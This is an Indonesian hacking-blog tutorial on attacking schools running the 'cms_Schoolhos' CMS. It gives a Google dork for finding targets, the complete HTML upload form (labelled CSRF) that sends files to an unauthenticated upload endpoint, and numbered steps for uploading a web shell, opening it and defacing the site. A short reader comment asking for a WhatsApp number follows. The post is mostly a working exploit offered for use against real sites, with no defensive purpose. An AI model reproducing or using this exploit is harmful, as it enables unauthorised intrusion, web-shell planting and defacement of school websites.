CSRF cms_Schoolhos
Langsung saja kita mulai Tutorialnya
Upss.., sebelum itu kita siapkan alat tempurnya, apa saja alat tempurnya ?!
- Shell Backdoor ( Saya rasa udah punya sendiri sendiri )
- Script Deface ( Saya rasa udah punya sendiri sendiri )
- Dork :
inurl:/?p=berita ( Kembangkan dorknya )
-CSRF :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tatsumi Crew</title>
</head>
<body>
<form method="POST" action="site.com/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
<input type="file" name="fupload">
<input type="submit" class="tombol" value="Upload">
</form>
</body>
</html>
Note: Yang warna merah ganti menjadi site target kalian.
Langusung saja :
1. Dorking dulu di google ( Berdoa saja semoga dapat yang vuln )
2. Jika sudah masukkan exploitnya seperti ini
contoh
site.com/[PATCH]/elearningku/proses.php
Jika ada blank atau putih berarti vuln selanjutnya
3. Masukkan link beserta exploit tadi ke dalam CSRF
4. Dan save CSRF dengan format .html
contoh : CSRF.html
5. Buka CSRF tersebut menggunakan browser kalian
6. Upload shell kalian
7. Akses shell ?!
site.com/file/materi/namashell.php
Sekianlah Postingan Dari All Tutor Cyber tentang "CSRF cms_Schoolhos" Semoga Bisa Bermanfaat!
Anda Sekarang Sedang Membaca Postingan "CSRF cms_Schoolhos" Dengan URL https://www.alltutorcyber.me/2018/07/csrf-cmsschoolhos.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.
brp nomor wa bang
ReplyDelete